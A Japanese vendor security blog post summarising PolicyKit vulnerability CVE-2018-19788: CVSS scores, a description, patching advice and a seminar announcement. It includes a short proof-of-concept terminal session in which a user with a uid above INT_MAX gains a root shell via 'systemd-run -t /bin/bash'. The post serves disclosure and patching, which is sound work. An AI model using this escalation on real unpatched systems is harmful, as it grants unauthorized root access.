Policy Kitの脆弱性情報(Moderate: CVE-2018-19788)

こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。

12/03/2018にPolicy Kitの脆弱性情報(Moderate: CVE-2018-19788)が公開されています。条件が特殊なのが前提になりますが、簡単に再現(PoC)が出来るため、今回はこちらの脆弱性の概要と、各ディストリビューションの対応について簡単にまとめてみます。




Priority

  • CVE-2018-19788

    Moderate

    • SuSE
      • CVSS v3 Base Score: 4.8
      • Vector: AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:H
    • Red Hat Customer Potal
      • CVSS v3 Base Score: 7
      • Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
    • NVD

修正方法

各ディストリビューションの情報を確認してください。

CVE概要(詳細はCVEのサイトをご確認ください)

  • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19788
    • ローカルユーザによる任意のコマンド実行と特権昇格の可能性
    • 重要度 - Moderate
    • PolicyKit 0.115に問題が見つかりました。INT_MAX以上のuidを持つユーザは任意のsystemctlコマンドを実行することが可能で、これを利用して特権を昇格することが可能です。

PoC


testuser@localhost:~$ id
uid=4000000000(testuser) gid=4000000000(testuser) groups=4000000000(testuser)

testuser@localhost:~$ systemd-run -t /bin/bash

(process:1355): GLib-GObject-WARNING **: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Running as unit: run-u11.service
Press ^] three times within 1s to disconnect TTY.
root@localhost:/# 
root@localhost:/# id
uid=0(root) gid=0(root) groups=0(root)

主なディストリビューションの対応方法

詳細は、各ディストリビューションの提供元にご確認ください


対処方法

各ディストリビューションの案内に従い、アップデートを行ってください。全てのRed Hat製品でパッチが行き渡っているかを確認するには、Red Hat SatelliteKatello、Spacewalk等を使うと管理が便利でしょう。

セキュリティ系連載案内


セミナー情報

2019/01/09 18:30-20:30で、「OSSライセンスMeetup Vol.1」を行います。

今回は技術評論社刊「OSSライセンスの教科書」著者・上田さんを迎えて刊行に至った理由・本著に込めた思い・見どころなどを語っていただき、後半ではテクニカルライター可知豊さんと共に上田さんと本書についてのディスカッションを行います。

https://sios.connpass.com/event/104422/がプログラム内容と申し込みの詳細になります。奮ってご参加下さい。

OSSに関するお困りごとは サイオス OSSよろず相談室まで

サイオスOSSよろず相談室 では、OSSを利用する中で発生する問題に対し、長年培ってきた技術力・サポート力をもって企業のOSS活用を強力に支援します。Red Hat Enterprise Linux のほか、CentOS をご利用されている環境でのサポートも提供いたします。

前へ

foremanの脆弱性情報(Moderate: CVE-2018-16861)

次へ

phpMyAdminの複数の脆弱性情報(Severe(重大): CVE-2018-19968, Moderate: CVE-2018-19969, CVE-2018-19970)